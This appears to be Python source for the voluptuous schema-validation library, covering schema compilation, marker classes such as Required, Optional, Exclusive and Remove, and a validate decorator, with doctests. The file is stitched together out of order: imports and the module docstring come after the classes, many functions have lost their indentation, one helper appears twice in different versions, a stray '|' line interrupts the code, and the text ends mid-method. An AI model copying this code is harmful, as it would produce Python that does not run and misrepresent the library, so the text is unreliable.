        if isinstance(schema, _Mapping):
            return self._compile_dict(schema)
        elif isinstance(schema, list):
            return self._compile_list(schema)
        elif isinstance(schema, tuple):
            return self._compile_tuple(schema)
        elif isinstance(schema, (frozenset, set)):
            return self._compile_set(schema)
        type_ = type(schema)
        if inspect.isclass(schema):
            type_ = schema
        # Everything else: primitive types/values and arbitrary callables are
        # handled by the scalar compiler.
        if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
                     list, dict, type(None)) or callable(schema):
            return _compile_scalar(schema)
        raise er.SchemaError('unsupported schema data type %r' %
                             type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
    def _compile_object(self, schema):
        """Validate an object.

        Has the same behavior as dictionary validator but work with object
        attributes.

        For example:

        >>> class Structure(object):
        ...     def __init__(self, one=None, three=None):
        ...         self.one = one
        ...         self.three = three
        ...
        >>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
        >>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
        ...   validate(Structure(one='three'))
        """
        base_validate = self._compile_mapping(
            schema, invalid_msg='object value')

        def validate_object(path, data):
            # Optional class restriction carried on the Object schema.
            if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
                raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
            # Only attributes with a non-None value take part in validation.
            iterable = _iterate_object(data)
            iterable = ifilter(lambda item: item[1] is not None, iterable)
            out = base_validate(path, iterable, {})
            # Rebuild an instance of the same class from the validated attrs.
            return type(data)(**out)
        return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
    def _compile_sequence(self, schema, seq_type):
        """Validate a sequence type.

        This is a sequence of valid values or validators tried in order.

        >>> validator = Schema(['one', 'two', int])
        >>> validator(['one'])
        ['one']
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator([3.5])
        >>> validator([1])
        [1]
        """
        _compiled = [self._compile(s) for s in schema]
        seq_type_name = seq_type.__name__

        def validate_sequence(path, data):
            if not isinstance(data, seq_type):
                raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)

            # Empty seq schema, allow any data.
            if not schema:
                if data:
                    raise er.MultipleInvalid([
                        er.ValueInvalid('not a valid value', [value]) for value in data
                    ])
                return data

            out = []
            invalid = None
            errors = []
            index_path = UNDEFINED
            for i, value in enumerate(data):
                index_path = path + [i]
                invalid = None
                # First member validator that accepts the value wins.
                for validate in _compiled:
                    try:
                        cval = validate(index_path, value)
                        if cval is not Remove:  # do not include Remove values
                            out.append(cval)
                        break
                    except er.Invalid as e:
                        if len(e.path) > len(index_path):
                            # Error is nested deeper than this element: fatal.
                            raise
                        invalid = e
                else:
                    # No validator accepted this element; remember last error.
                    errors.append(invalid)
            if errors:
                raise er.MultipleInvalid(errors)
            if _isnamedtuple(data):
                return type(data)(*out)
            else:
                return type(data)(out)
        return validate_sequence
    def _compile_tuple(self, schema):
        """Validate a tuple.

        A tuple is a sequence of valid values or validators tried in order.

        >>> validator = Schema(('one', 'two', int))
        >>> validator(('one',))
        ('one',)
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator((3.5,))
        >>> validator((1,))
        (1,)
        """
        # Shared machinery with lists; only the accepted sequence type differs.
        return self._compile_sequence(schema, tuple)
    def _compile_list(self, schema):
        """Validate a list.

        A list is a sequence of valid values or validators tried in order.

        >>> validator = Schema(['one', 'two', int])
        >>> validator(['one'])
        ['one']
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator([3.5])
        >>> validator([1])
        [1]
        """
        # Shared machinery with tuples; only the accepted sequence type differs.
        return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
    def extend(self, schema, required=None, extra=None):
        """Create a new `Schema` by merging this and the provided `schema`.

        Neither this `Schema` nor the provided `schema` are modified. The
        resulting `Schema` inherits the `required` and `extra` parameters of
        this, unless overridden.

        Both schemas must be dictionary-based.

        :param schema: dictionary to extend this `Schema` with
        :param required: if set, overrides `required` of this `Schema`
        :param extra: if set, overrides `extra` of this `Schema`
        """
        assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'

        result = self.schema.copy()

        # returns the key that may have been passed as argument to a Marker
        # constructor, i.e. unwraps Required/Optional/... down to the literal
        def key_literal(key):
            return (key.schema if isinstance(key, Marker) else key)

        # build a map that takes the key literals to the needed objects
        # literal -> Required|Optional|literal
        result_key_map = dict((key_literal(key), key) for key in result)

        # for each item in the extension schema, replace duplicates
        # or add new keys
        for key, value in iteritems(schema):

            # if the key is already in the dictionary, we need to replace it
            # transform key to literal before checking presence
            if key_literal(key) in result_key_map:

                result_key = result_key_map[key_literal(key)]
                result_value = result[result_key]

                # if both are dictionaries, we need to extend recursively
                # create the new extended sub schema, then remove the old key
                # and add the new one
                if type(result_value) == dict and type(value) == dict:
                    new_value = Schema(result_value).extend(value).schema
                    del result[result_key]
                    result[key] = new_value
                # one or the other or both are not sub-schemas, simple
                # replacement is fine: remove old key and add new one
                else:
                    del result[result_key]
                    result[key] = value

            # key is new and can simply be added
            else:
                result[key] = value

        # recompile and return a schema of the same (possibly derived) class
        result_cls = type(self)
        result_required = (required if required is not None else self.required)
        result_extra = (extra if extra is not None else self.extra)
        return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
"""A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a')
"""
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
    """Iterate over schema in a meaningful order.

    Yields the compiled mapping's items sorted by the priority function built
    in ``_compile_itemsort`` (literal values first, catch-alls last).
    """
    # Without this, Extra might appear first in the iterator, and fail to
    # validate a key even though it's a Required that has its own validation,
    # generating a false positive.
    return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
    """Yield ``(attribute, value)`` pairs of *obj*, respecting __slots__.

    Attributes come from ``vars(obj)`` when available, falling back to
    ``_asdict()`` for namedtuples; names listed in ``__slots__`` are yielded
    afterwards (skipping the ``__dict__`` slot itself).
    """
    attrs = {}
    try:
        attrs = vars(obj)
    except TypeError:
        # No __dict__ -- maybe we have a namedtuple here?
        if hasattr(obj, '_asdict'):
            attrs = obj._asdict()
    for pair in iteritems(attrs):
        yield pair
    try:
        slots = obj.__slots__
    except AttributeError:
        return
    for name in slots:
        if name != '__dict__':
            yield (name, getattr(obj, name))
class Msg(object):
    """Report a user-friendly message if a schema fails to validate.

    >>> validate = Schema(
    ...   Msg(['one', 'two', int],
    ...       'should be one of "one", "two" or an integer'))
    >>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
    ...   validate(['three'])

    Messages are only applied to invalid direct descendants of the schema:

    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
    >>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
    ...   validate([['three']])

    The type which is thrown can be overridden but needs to be a subclass of Invalid:

    >>> with raises(er.SchemaError, 'Msg can only use subclasses of Invalid as custom class'):
    ...   validate = Schema(Msg([int], 'should be int', cls=KeyError))

    If you do use a subclass of Invalid, that error will be thrown (wrapped
    in a MultipleInvalid):

    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
    >>> try:
    ...   validate(['three'])
    ... except er.MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], er.RangeInvalid)
    """

    def __init__(self, schema, msg, cls=None):
        """Wrap *schema*; report *msg* (raised as *cls*, default Invalid).

        :raises SchemaError: if ``cls`` is not an ``Invalid`` subclass.
        """
        if cls and not issubclass(cls, er.Invalid):
            # Fixed typo in the user-facing error text:
            # "subclases" -> "subclasses".
            raise er.SchemaError("Msg can only use subclasses of"
                                 " Invalid as custom class")
        self._schema = schema
        self.schema = Schema(schema)
        self.msg = msg
        self.cls = cls

    def __call__(self, v):
        try:
            return self.schema(v)
        except er.Invalid as e:
            if len(e.path) > 1:
                # Nested failure: keep the specific message from below.
                raise e
            raise (self.cls or er.Invalid)(self.msg)

    def __repr__(self):
        return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
    """Indicate that we should work with attributes, not keys."""

    def __init__(self, schema, cls=UNDEFINED):
        # cls, when given, restricts validation to instances of that class.
        self.cls = cls
        super(Object, self).__init__(schema)
class VirtualPathComponent(str):
    """Path element for synthetic (group) locations, rendered as ``<name>``."""

    def __str__(self):
        # NOTE: plain concatenation; %-formatting would recurse into __str__.
        return ''.join(('<', self, '>'))

    def __repr__(self):
        return self.__str__()
# Markers.py
class Marker(object):
    """Mark nodes for special treatment.

    A Marker wraps a schema node and delegates validation to it; subclasses
    (``Required``, ``Optional``, ``Remove``, ...) change how the surrounding
    mapping treats the key.  Comparison and hashing are forwarded to the
    wrapped schema so a marker can be looked up like the bare key.
    """

    def __init__(self, schema_, msg=None, description=None):
        self.schema = schema_
        self._schema = Schema(schema_)
        self.msg = msg
        self.description = description

    def __call__(self, v):
        try:
            return self._schema(v)
        except er.Invalid as e:
            if not self.msg or len(e.path) > 1:
                # No custom message, or the error is nested: propagate as-is.
                raise
            raise er.Invalid(self.msg)

    def __str__(self):
        return str(self.schema)

    def __repr__(self):
        return repr(self.schema)

    def __lt__(self, other):
        other_key = other.schema if isinstance(other, Marker) else other
        return self.schema < other_key

    def __hash__(self):
        return hash(self.schema)

    def __eq__(self, other):
        return self.schema == other

    def __ne__(self, other):
        return not (self.schema == other)
class Optional(Marker):
    """Mark a node in the schema as optional, and optionally provide a default.

    >>> schema = Schema({Optional('key'): str})
    >>> schema({})
    {}
    >>> schema = Schema({Optional('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Optional('key', default=list): list})
    >>> schema({})
    {'key': []}

    Even when an entire schema is marked ``required``, Optional keys stay
    optional.
    """

    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Optional, self).__init__(schema, msg=msg,
                                       description=description)
        # Normalised to a zero-argument factory (or the UNDEFINED sentinel).
        self.default = default_factory(default)
class Exclusive(Optional):
    """Mark a node in the schema as exclusive.

    At most one key of each ``group_of_exclusion`` may appear in the
    validated dictionary; a second one raises ``ExclusiveInvalid`` (carrying
    ``msg``, if given).  This only makes sense for dictionary schemas.
    Typical use: alternative authentication payloads where exactly one
    variant is allowed at a time.

    >>> schema = Schema({Exclusive('alpha', 'angles'): int,
    ...                  Exclusive('beta', 'angles'): int})
    >>> schema({'alpha': 30})
    {'alpha': 30}
    >>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
    ...   schema({'alpha': 30, 'beta': 45})
    """

    def __init__(self, schema, group_of_exclusion, msg=None, description=None):
        super(Exclusive, self).__init__(schema, msg=msg,
                                        description=description)
        self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
    """Mark a node in the schema as inclusive.

    All keys sharing the same ``group_of_inclusion`` must be present
    together: either every key of the group appears in the data or none of
    them does, otherwise ``InclusiveInvalid`` (carrying ``msg``, if given)
    is raised.  Useful for fields that only make sense as a unit, e.g.
    ``height`` and ``width``.

    >>> schema = Schema({Inclusive('filename', 'file'): str,
    ...                  Inclusive('mimetype', 'file'): str})
    >>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
    >>> data == schema(data)
    True
    >>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
    ...   schema({'filename': 'dog.jpg'})
    >>> schema({})
    {}
    """

    def __init__(self, schema, group_of_inclusion,
                 msg=None, description=None, default=UNDEFINED):
        super(Inclusive, self).__init__(schema, msg=msg,
                                        default=default,
                                        description=description)
        self.group_of_inclusion = group_of_inclusion
class Required(Marker):
    """Mark a node in the schema as being required, and optionally provide a default value.

    >>> schema = Schema({Required('key'): str})
    >>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
    ...   schema({})
    >>> schema = Schema({Required('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Required('key', default=list): list})
    >>> schema({})
    {'key': []}
    """

    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Required, self).__init__(schema, msg=msg,
                                       description=description)
        # Normalised to a zero-argument factory (or the UNDEFINED sentinel).
        self.default = default_factory(default)
class Remove(Marker):
    """Mark a node in the schema to be removed and excluded from the validated
    output. Keys that fail validation will not raise ``Invalid``. Instead,
    these keys will be treated as extras.

    >>> schema = Schema({str: int, Remove(int): str})
    >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
    ...   schema({'keep': 1, 1: 1.0})
    >>> schema({1: 'red', 'red': 1, 2: 'green'})
    {'red': 1}
    >>> schema = Schema([int, Remove(float), Extra])
    >>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
    [1, 2, 3, 5, '7']
    """

    def __call__(self, v):
        # Validate like a plain Marker, then signal removal to the compilers
        # by returning the Remove class itself instead of the value.
        super(Remove, self).__call__(v)
        return self.__class__

    def __repr__(self):
        return "Remove(%r)" % (self.schema,)

    def __hash__(self):
        # Identity-based hash so distinct Remove markers stay distinct dict
        # keys even when they wrap equal schemas.
        return object.__hash__(self)
def message(default=None, cls=None):
    """Convenience decorator to allow functions to provide a message.

    Set a default message:

        >>> @message('not an integer')
        ... def isint(v):
        ...     return int(v)

        >>> validate = Schema(isint())
        >>> with raises(er.MultipleInvalid, 'not an integer'):
        ...   validate('a')

    The message can be overridden on a per validator basis:

        >>> validate = Schema(isint('bad'))
        >>> with raises(er.MultipleInvalid, 'bad'):
        ...   validate('a')

    The class thrown too:

        >>> class IntegerInvalid(er.Invalid): pass
        >>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
        >>> try:
        ...   validate('a')
        ... except er.MultipleInvalid as e:
        ...   assert isinstance(e.errors[0], IntegerInvalid)
    """
    if cls and not issubclass(cls, er.Invalid):
        # Fixed typo in user-facing error message ("subclases" -> "subclasses").
        raise er.SchemaError("message can only use subclasses of Invalid as custom class")

    def decorator(f):
        # The decorated function becomes a validator *factory*: calling it
        # (optionally with msg/clsoverride) yields the actual validator.
        @wraps(f)
        def check(msg=None, clsoverride=None):
            @wraps(f)
            def wrapper(*args, **kwargs):
                try:
                    return f(*args, **kwargs)
                except ValueError:
                    # ValueError from the wrapped function is translated
                    # into the configured Invalid subclass and message.
                    raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
            return wrapper
        return check
    return decorator
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
def validate(*a, **kw):
    """Decorator for validating arguments of a function against a given schema.

    Set restrictions for arguments:

        >>> @validate(arg1=int, arg2=int)
        ... def foo(arg1, arg2):
        ...   return arg1 * arg2

    Set restriction for returned value:

        >>> @validate(arg=int, __return__=int)
        ... def bar(arg1):
        ...   return arg1 * 2

    """
    RETURNS_KEY = '__return__'

    def validate_schema_decorator(func):
        # Positional schema specs are matched to parameter names first,
        # then keyword specs are layered on top.
        spec = _merge_args_with_kwargs(_args_to_dict(func, a), kw)

        # The special '__return__' key constrains the return value.
        returns_defined = RETURNS_KEY in spec
        returns = spec.pop(RETURNS_KEY, None)

        # Extra keys are allowed so partially-annotated signatures work.
        if spec:
            input_schema = Schema(spec, extra=ALLOW_EXTRA)
        else:
            input_schema = lambda x: x
        output_schema = Schema(returns) if returns_defined else lambda x: x

        @wraps(func)
        def func_wrapper(*args, **kwargs):
            arguments = _merge_args_with_kwargs(_args_to_dict(func, args),
                                                kwargs)
            validated = input_schema(arguments)
            return output_schema(func(**validated))

        return func_wrapper

    return validate_schema_decorator
|
def _iterate_object(obj):
    """Return iterator over object attributes. Respect objects with
    defined __slots__.

    Yields ``(name, value)`` pairs gathered from ``vars(obj)`` (or a
    namedtuple's ``_asdict``), followed by any ``__slots__`` attributes.
    """
    try:
        attrs = vars(obj)
    except TypeError:
        # No __dict__ -- maybe we have a named tuple here?
        attrs = obj._asdict() if hasattr(obj, '_asdict') else {}
    for pair in attrs.items():
        yield pair
    # Classes using __slots__ store attributes outside __dict__.
    slots = getattr(obj, '__slots__', None)
    if slots is not None:
        for name in slots:
            if name != '__dict__':
                yield (name, getattr(obj, name))
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
long = int
unicode = str
basestring = str
ifilter = filter
def iteritems(d):
return d.items()
else:
from itertools import ifilter
def iteritems(d):
return d.iteritems()
if sys.version_info >= (3, 3):
_Mapping = collections.abc.Mapping
else:
_Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
    """Sentinel type whose single instance marks "no value supplied".

    Instances are always falsy so a missing default can be treated like
    an empty value.
    """

    def __nonzero__(self):  # Python 2 truthiness hook
        return False

    # Python 3 consults __bool__, not __nonzero__; without this alias an
    # Undefined instance would be *truthy* on Python 3, contradicting the
    # intent expressed by __nonzero__ above.
    __bool__ = __nonzero__

    def __repr__(self):
        return '...'


# Module-wide singleton; code compares with ``value is UNDEFINED``.
UNDEFINED = Undefined()
def Self():
    # Marker used to declare recursive schemas; Schema._compile
    # special-cases the function object itself, so it is never invoked.
    raise er.SchemaError('"Self" should never be called')
def default_factory(value):
    """Normalise a default spec into a zero-argument callable.

    ``UNDEFINED`` and callables pass through untouched; any other value
    is wrapped so that calling the result produces it.
    """
    if value is not UNDEFINED and not callable(value):
        return lambda: value
    return value
@contextmanager
def raises(exc, msg=None, regex=None):
    """Doctest helper: assert that the managed block raises *exc*.

    Optionally checks the exception text for an exact *msg* match or a
    *regex* search hit.  A block that raises nothing passes silently,
    matching this helper's historical behaviour.
    """
    try:
        yield
    except exc as error:
        text = str(error)
        if msg is not None:
            assert text == msg, '%r != %r' % (text, msg)
        if regex is not None:
            assert re.search(regex, text), '%r does not match %r' % (text, regex)
def Extra(_):
    """Allow keys in the data that are not present in the schema."""
    # Sentinel only: the compiler matches on the function object itself
    # and never actually calls it.
    raise er.SchemaError('"Extra" should never be called')


# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
    """A validation schema.

    The schema is a Python tree-like structure where nodes are pattern
    matched against corresponding trees of values.

    Nodes can be values, in which case a direct comparison is used, types,
    in which case an isinstance() check is performed, or callables, which will
    validate and optionally convert the value.

    We can equate schemas also.

    For Example:

        >>> v = Schema({Required('a'): unicode})
        >>> v1 = Schema({Required('a'): unicode})
        >>> v2 = Schema({Required('b'): unicode})
        >>> assert v == v1
        >>> assert v != v2
    """

    # Reverse lookup used only by __repr__ to render the extra-keys policy.
    _extra_to_name = {
        REMOVE_EXTRA: 'REMOVE_EXTRA',
        ALLOW_EXTRA: 'ALLOW_EXTRA',
        PREVENT_EXTRA: 'PREVENT_EXTRA',
    }
    def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
        """Create a new Schema.

        :param schema: Validation schema. See :module:`voluptuous` for details.
        :param required: Keys defined in the schema must be in the data.
        :param extra: Specify how extra keys in the data are treated:

            - :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
              extra keys (raise ``Invalid``).
            - :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
              keys in the output.
            - :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
              from the output.
            - Any value other than the above defaults to
              :const:`~voluptuous.PREVENT_EXTRA`
        """
        self.schema = schema
        self.required = required
        self.extra = int(extra)  # ensure the value is an integer
        # Compile once up front; every validation call reuses the result.
        self._compiled = self._compile(schema)
    @classmethod
    def infer(cls, data, **kwargs):
        """Create a Schema from concrete data (e.g. an API response).

        For example, this will take a dict like:

            {
                'foo': 1,
                'bar': {
                    'a': True,
                    'b': False
                },
                'baz': ['purple', 'monkey', 'dishwasher']
            }

        And return a Schema:

            {
                'foo': int,
                'bar': {
                    'a': bool,
                    'b': bool
                },
                'baz': [str]
            }

        Note: only very basic inference is supported.
        """
        def value_to_schema_type(value):
            # Recurse into containers; an empty container maps to the bare
            # container type because no element type can be inferred.
            if isinstance(value, dict):
                if len(value) == 0:
                    return dict
                return {k: value_to_schema_type(v)
                        for k, v in iteritems(value)}
            if isinstance(value, list):
                if len(value) == 0:
                    return list
                else:
                    return [value_to_schema_type(v)
                            for v in value]
            # Scalars are represented by their concrete type.
            return type(value)

        return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
